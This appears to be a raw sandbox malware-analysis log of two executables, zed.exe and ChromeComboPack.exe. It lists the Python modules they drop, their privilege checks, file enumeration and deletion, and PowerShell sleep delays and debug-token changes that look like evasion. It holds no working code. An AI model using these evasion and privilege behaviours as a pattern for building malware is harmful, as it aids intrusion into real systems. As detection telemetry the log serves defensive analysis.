Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\python3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\python3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_cffi_backend.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_cffi_backend.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\python312.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_cffi_backend.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\charset_normalizer\md.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\charset_normalizer\md.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\select.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\select.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Util\_cpuid_c.pyd	Jump to dropped file

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_32-18860
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_6-17581

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6060	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788	Thread sleep count: 2419 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052	Thread sleep count: 484 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4800	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6876	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5309280 FindFirstFileExW,FindClose,	6_2_00007FF7E5309280
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5321874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	6_2_00007FF7E5321874
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E53083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	6_2_00007FF7E53083C0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9B7810 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	32_2_00007FF78C9B7810
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9B87E0 FindFirstFileExW,FindClose,	32_2_00007FF78C9B87E0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D2A84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	32_2_00007FF78C9D2A84

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: powershell.exe, 00000000.00000002.4874183283.000001EE2F1F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWonde%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000000E.00000002.3166041238.0000025B4BB4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000E.00000002.3166041238.0000025B4BB4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3081131778.00000132F844A000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8375000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWstem%SystemRoot%\system32\mswsock.dllhods of the socket object.
Source: powershell.exe, 0000000E.00000002.3166041238.0000025B4BB4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe

Code function: 6_2_00007FF7E531A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_00007FF7E531A614

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe

34_2_00007FFD8A19DB00

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe

Code function: 6_2_00007FF7E5323480 GetProcessHeap,

6_2_00007FF7E5323480

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
